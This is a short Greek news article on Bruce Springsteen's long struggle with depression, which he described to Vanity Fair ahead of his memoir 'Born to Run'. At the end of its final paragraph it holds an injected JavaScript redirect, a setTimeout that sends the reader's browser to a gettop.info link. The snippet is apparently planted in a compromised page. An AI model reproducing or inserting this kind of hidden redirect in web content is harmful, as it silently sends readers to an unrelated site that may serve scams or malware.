Η μάχη του Bruce Springsteen με την κατάθλιψη

0
36

 

Την μάχη που έδωσε – δίνει με έναν «ύπουλο» εχθρό, αποκάλυψε σε συνέντευξή του στο περιοδικό Vanity Fair, ο μέγας Bruce Springsteen.

Λίγο πριν από την κυκλοφορία της νέας του αυτοβιογραφίας «Born to Run», στις 27 Σεπτεμβρίου, ο 66χρονος ροκ σταρ εκθέτει τη μακρά μάχη του με την κατάθλιψη, αποκαλύπτοντας, ότι επισκέφτηκε ψυχοθεραπευτή για πρώτη φορά πριν από 30 χρόνια.

Παράλληλα, δεν διστάζει να εκφράσει τους φόβους του ότι θα υποφέρει με τον ίδιο τρόπο που υπέφερε και ο πατέρας του. Στο βιβλίο του, μάλιστα ο Springsteen, αναφέρει ότι ο πατέρα του είχε συγγενείς με σοβαρά θέματα ψυχικής υγείας.

Για την φάση της ζωής του που κατάστασή του δείχνει να ξεφεύγει από κάθε έλεγχο, αναφέρει χαρακτηριστικά ότι γυναίκα του Patti έρχεται αντιμέτωπη με «ένα τρένο γεμάτο νιτρογλυκερίνη, έτοιμο να εκτροχιαστεί«.

«Ως παιδί ήμουν απλά μυστηριώδης, ενοχλητικός και συνηθισμένος», θα πει σε άλλο σημείο αναφερόμενος στην παιδική του ηλικία. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here